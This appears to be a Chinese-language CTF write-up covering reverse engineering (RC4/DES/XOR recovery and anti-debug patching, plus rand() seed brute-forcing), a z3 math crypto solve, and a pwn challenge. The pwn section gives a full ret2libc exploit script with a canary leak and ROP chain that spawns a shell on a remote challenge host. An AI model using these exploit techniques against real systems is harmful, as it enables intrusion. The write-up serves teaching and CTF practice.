(沒寫幾題,就記錄一下,misc寫的基本都是佬們打爆的幾題,就不寫了
REVERSE
(如果有佬出了rust的flag,求佬告訴我一下orz,太菜了,沒運行出來,驗證不了flag,麻煩佬們告訴下orz)
ezre
觀察程序,其中有base64、rc4、DES算法,
函數主要邏輯:輸入一串字符,前一位和后一位異或,再rc4加密,最后des加密,DES算法給出了加密解密,0x65為加密,0x64為解密
根據動調來做,其中要注意的是tls函數對DES的密鑰和輸入的數據進行了改動
手動把兩個tls函數判斷是否調試的地方改一下,繞過反調試,
可以手動patch,也可以改ZF的值,
patch的話可以將74改成75,即可繞過反調試
輸入flag{12345678901234567890123456789012}
調試到異或后,
取出數組十六進制數據為,
0A 0D 06 1C 4A 03 01 07 01 03 01 0F 01 09 01 03 01 07 01 03 01 0F 01 09 01 03 01 07 01 03 01 0F 01 09 01 03 4F 7D
經過rc4加密后數據為
3F D8 A0 03 BA 63 83 A7 C6 AC AD B2 D6 25 30 5B 83 88 96 C7 CE B9 22 AC 8D 1F 79 91 7E 73 38 F4 FC 98 CA A9 B7 D4
可用這兩個異或,得到xor_key,
將此處的0x65改為0x64,并把最后判斷的數組byte_40B078提取出來,
在des解密前,將byte_40B668的數據改為byte_EBB078的值
11 C3 77 FE 6F D2 EB F1 CF 1E 50 4D 70 4C 25 29
B5 CA 75 DB 8C 19 82 D9 1F E1 5E 58 EB 4B 51 D2
75 F4 BA 1F 61 0D 45 BD
通過解密后,得到
3F D8 A0 03 E9 63 D2 F2 97 FD A8 B9 87 7B 36 5F D0 8B 91 C5 99 E2 20 A6 DF 4A 2C 93 27 7E 3A F7 FD CD 97 AB BC D4
最后寫個腳本逆推出flag
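# Recover the flag from three debugger captures: peel off the RC4 layer with a
# known-plaintext keystream, then undo the adjacent-byte XOR chain.

# x1: buffer captured right after the adjacent-byte XOR step, for the probe
#     input flag{12345678901234567890123456789012}.
x1 = [0x0A, 0x0D, 0x06, 0x1C, 0x4A, 0x03, 0x01, 0x07, 0x01, 0x03,
      0x01, 0x0F, 0x01, 0x09, 0x01, 0x03, 0x01, 0x07, 0x01, 0x03,
      0x01, 0x0F, 0x01, 0x09, 0x01, 0x03, 0x01, 0x07, 0x01, 0x03,
      0x01, 0x0F, 0x01, 0x09, 0x01, 0x03, 0x4F, 0x7D]

# x2: the same buffer captured right after the RC4 step.
x2 = [0x3F, 0xD8, 0xA0, 0x03, 0xBA, 0x63, 0x83, 0xA7, 0xC6, 0xAC,
      0xAD, 0xB2, 0xD6, 0x25, 0x30, 0x5B, 0x83, 0x88, 0x96, 0xC7,
      0xCE, 0xB9, 0x22, 0xAC, 0x8D, 0x1F, 0x79, 0x91, 0x7E, 0x73,
      0x38, 0xF4, 0xFC, 0x98, 0xCA, 0xA9, 0xB7, 0xD4]

# result: the comparison data after the DES layer was undone in the debugger,
#         i.e. the real flag still wrapped in RC4 and the XOR chain.
result = [0x3F, 0xD8, 0xA0, 0x03, 0xE9, 0x63, 0xD2, 0xF2, 0x97, 0xFD,
          0xA8, 0xB9, 0x87, 0x7B, 0x36, 0x5F, 0xD0, 0x8B, 0x91, 0xC5,
          0x99, 0xE2, 0x20, 0xA6, 0xDF, 0x4A, 0x2C, 0x93, 0x27, 0x7E,
          0x3A, 0xF7, 0xFD, 0xCD, 0x97, 0xAB, 0xBC, 0xD4]

# RC4 is a stream cipher, so input XOR output of one run is the keystream.
# The write-up relies on the program using the same keystream for every input,
# which is why a single known pair is enough to strip the layer from the target.
xor_key = [before ^ after for before, after in zip(x1, x2)]

# Remove the RC4 layer from the target data.
result = [value ^ key_byte for value, key_byte in zip(result, xor_key)]

# Undo the chain: each byte was XORed with its successor and the last byte is
# left as-is by this loop, so walk backwards from the second-to-last position.
for i in range(len(result) - 2, -1, -1):
    result[i] ^= result[i + 1]

print(bytes(result))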
得到flag{ba1c3aea1faf4067a565f0da97488d89}
rev_randomize2
(賽后在本地復現出的,遠程環境關了,不知道遠程行不行,如果有誤,輕點噴orz,方法比較爛,就硬爆隨機數種子,有點廢電腦,也有點看運氣,隨機數種子小的話,就很快)
代碼主要邏輯,開始有初始分1000,猜對一個隨機數加1分,再猜對一個加2分,依此類推,猜錯的話,規律一樣,當分數大于2000分,即可得到flag
sub_1289函數初始化隨機數種子
sub_12FE獲取生成的隨機數
然后開跑,這里的libc.so.6是直接用pwn題給的libc,記得在本地建個flag文件,不然跑了半天出了才知道還沒有文件(問就是我)
from pwn import *
from ctypes import *
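# Local reproduction of the seed search described in the write-up.
#
# NOTE(review): the approach works because the service's numbers come from
# srand()/rand(), whose whole output sequence is fixed by a 32-bit seed, and
# because the service prints its number after every guess. A service that needs
# unpredictable values should draw them from the OS CSPRNG instead.
context.log_level = "debug"
# p = remote('39.107.71.45', '25568')
p = process('./randomize')
# Load the challenge's libc through ctypes so srand()/rand() match the target.
elf = cdll.LoadLibrary('./libc.so.6')


def _read_revealed_number():
    """Send a throwaway guess of 1 and return the number the service prints."""
    p.recvuntil(b'Now guess!\n')
    p.sendline(b'1')
    p.recvuntil(b'The number in my mind is ')
    return int(p.recvuntil(b'\n')[:-1])


# Three consecutive outputs are used to identify the seed.
a = _read_revealed_number()
b = _read_revealed_number()
c = _read_revealed_number()
print(a)
print(b)
print(c)

# Try every candidate seed in the range and compare the first three outputs.
# The target shifts each rand() value right by 15 bits, so do the same here.
number = None
for i in range(0x10000000, 0x100000000):
    elf.srand(i)
    x = elf.rand() >> 15
    y = elf.rand() >> 15
    z = elf.rand() >> 15
    if x == a and y == b and z == c:
        print(hex(i))
        number = i
        break

# Without this guard an unsuccessful search ends in a NameError on `number`.
if number is None:
    raise SystemExit("no seed in the searched range reproduces the observed numbers")

# Re-seed and step past the three values the service has already used.
elf.srand(number)
print(elf.rand() >> 15)
print(elf.rand() >> 15)
print(elf.rand() >> 15)

# presumably 1000 minus the 1 + 2 + 3 points lost on the three probe guesses;
# verify against the scoring rule in the binary.
score = 994
for i in range(100):
    payload = str(elf.rand() >> 15)
    p.sendline(payload.encode())
    score += (i + 1)
    if score >= 2000:
        break
    p.recvuntil(b'Now guess!\n')
p.interactive()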
CRYPTO
math
沒有時間限制,就直接本地挨個解了,沒寫交互腳本
import hashlib
import itertools
from string import digits, ascii_letters, punctuation
# alpha_bet=digits+ascii_letters+punctuation
# strlist = itertools.product(alpha_bet, repeat=4)
# sha256="710dd6a2908fed2a9977445f021333d176f39060f3b14c8ebe73ab12d4946461"
# tail="QlRvhN1QqRksWBrG"
# xxxx=''
# for i in strlist:
# data=i[0]+i[1]+i[2]+i[3]
# data_sha=hashlib.sha256((data+str(tail)).encode('utf-8')).hexdigest()
# if(data_sha==str(sha256)):
# xxxx=data
# break
# print(xxxx)
# pow(p,9)+pow(q,9): 2824822169624626054661488626925458420744715781080646942074253083493110409304139573698331220638806746185475842194119961243645804370254606328869920018072689414438851986763034645626556982418990163940800474549193470898195538208390077574728861492183878546810890489530709875694439708304188836872775133284206949916525601873082688977829638863138990316027434787047769932507784217745872371234159638863412009751336370516261263894787945468938670587885217215533551430379370918887017578135901512047635699889591590644728268209911213837545954673959103136577695532350503753325666353616999846273454813736702876968828262577312436890164868139215146941181825104314265142027185641195497429436701158821466597436322426101818844710031297488336024894303790150460476458932731090576824660354020881969224935848618388008509287249786048287099709905361669995934683044400119527112547308946141798312531702089592589519108535371095268166661526029944144811749355534331341058531140340843830280132820250819782775604064279338833095450886869781021370514423225666663969097910935332887127861068226704314810075641777615479058315604743490070494698514916318640565210625873112244649996112730726083223048152494260522865824835075057025248755461487069699219010214934196309822790800505679440651281428272245964425847552725070324370935048163205674057942566606069023173193117188785459966877961255640155226356782264373613291491124970651673222
# pow(p,3)+pow(q,3): 2170975452570130427181048521695873973135933481372313804498232310176782170227124595928130478815483294370924323759914604172695746976894120890757779825855362817255229290661676271054758017616180660951572648811631474401996380573736869074007533444837272191850638568203334900550339868176862783180156627459202829081595794230688694799962290853974633400675886602057846186352130394606371882689934371132063210289099864922945499792531454940004181032574377548535600071749073142
from z3 import *
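# Solve for the integers p and q from the two power sums given by the
# challenge, then print (p*q) % (p+q), the value the script is after.
p, q = Ints('p q')
solver = Solver()  # create a solver instance
solver.add(pow(p, 9) + pow(q, 9) == 2824822169624626054661488626925458420744715781080646942074253083493110409304139573698331220638806746185475842194119961243645804370254606328869920018072689414438851986763034645626556982418990163940800474549193470898195538208390077574728861492183878546810890489530709875694439708304188836872775133284206949916525601873082688977829638863138990316027434787047769932507784217745872371234159638863412009751336370516261263894787945468938670587885217215533551430379370918887017578135901512047635699889591590644728268209911213837545954673959103136577695532350503753325666353616999846273454813736702876968828262577312436890164868139215146941181825104314265142027185641195497429436701158821466597436322426101818844710031297488336024894303790150460476458932731090576824660354020881969224935848618388008509287249786048287099709905361669995934683044400119527112547308946141798312531702089592589519108535371095268166661526029944144811749355534331341058531140340843830280132820250819782775604064279338833095450886869781021370514423225666663969097910935332887127861068226704314810075641777615479058315604743490070494698514916318640565210625873112244649996112730726083223048152494260522865824835075057025248755461487069699219010214934196309822790800505679440651281428272245964425847552725070324370935048163205674057942566606069023173193117188785459966877961255640155226356782264373613291491124970651673222)
solver.add(pow(p, 3) + pow(q, 3) == 2170975452570130427181048521695873973135933481372313804498232310176782170227124595928130478815483294370924323759914604172695746976894120890757779825855362817255229290661676271054758017616180660951572648811631474401996380573736869074007533444837272191850638568203334900550339868176862783180156627459202829081595794230688694799962290853974633400675886602057846186352130394606371882689934371132063210289099864922945499792531454940004181032574377548535600071749073142)
# check() reports whether the constraints are satisfiable; any result other
# than sat (including an inconclusive one) falls through to the else branch.
if solver.check() == sat:
    ans = solver.model()  # model() returns the satisfying assignment
    p1 = ans[p].as_long()
    q1 = ans[q].as_long()
    print(ans)
    print(p1)
    print(q1)
    # Kept inside the sat branch: p1 and q1 exist only when a model was found,
    # so printing this unconditionally would raise NameError otherwise.
    print((p1 * q1) % (p1 + q1))
else:
    print("no ans!")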
PWN
ezstack
利用棧溢出和canary泄露的漏洞ret2libc
from pwn import *
# ret2libc solve for the ezstack challenge, as described in the write-up:
# a stack overflow combined with a canary leak.
#
# NOTE(review): the hard-coded 0x4013xx addresses only work if the binary is
# mapped at a fixed base, so it was presumably built without PIE. The root
# cause is the unbounded read into the stack buffer; bounding that read
# removes both the leak and the overwrite.
context(arch="amd64", os="linux", log_level='debug')

e = ELF("./pwn2")
libc = ELF("libc.so.6")
p = remote('123.56.175.221', '17322')

# Addresses taken from the challenge binary.
puts_plt_addr = e.symbols["puts"]
puts_got_addr = e.got["puts"]
main_addr = e.symbols["main"]
rdi_addr = 0x401363  # presumably a `pop rdi; ret` gadget; confirm in the binary
ret = 0x401364       # presumably a bare `ret`, used as a spacer in the second chain

# Step 1: read back the 8 bytes that follow the echoed marker; the script
# treats them as the stack canary.
marker_line = b'a' * (0x30 - 10) + b'b'
p.sendline(marker_line)
p.recvuntil(b'b\n')
canary = u64(p.recv(8))
print(hex(canary))

# Both payloads share this prefix: filler up to the canary slot, the canary
# value put back unchanged, and 8 zero bytes for the next stack slot.
prefix = b'a' * (0x30 - 8) + p64(canary) + p64(0)

# Step 2: print the resolved puts address from the GOT and return to main.
first_chain = [rdi_addr, puts_got_addr, puts_plt_addr, main_addr]
payload = prefix + b''.join(p64(word) for word in first_chain)
p.sendlineafter(b'input: \n', payload)
leaked = p.recvuntil(b'\x7f')[-6:]
puts_addr = u64(leaked.ljust(8, b'\x00'))
print(hex(puts_addr))

# Step 3: derive the libc base from the leak and locate system and "/bin/sh".
base_addr = puts_addr - libc.sym['puts']
system_addr = base_addr + libc.sym['system']
binsh_addr = base_addr + next(libc.search(b'/bin/sh'))
print(hex(system_addr))
print(hex(binsh_addr))

# Step 4: second pass through main with the final chain.
second_chain = [ret, rdi_addr, binsh_addr, system_addr]
payload2 = prefix + b''.join(p64(word) for word in second_chain)
p.sendlineafter(b'input: \n', payload2)
p.interactive()
拿到權限后,得到flag,flag{nEsqteUbHFuy8mQTNXH7abj43C5Q4NQG}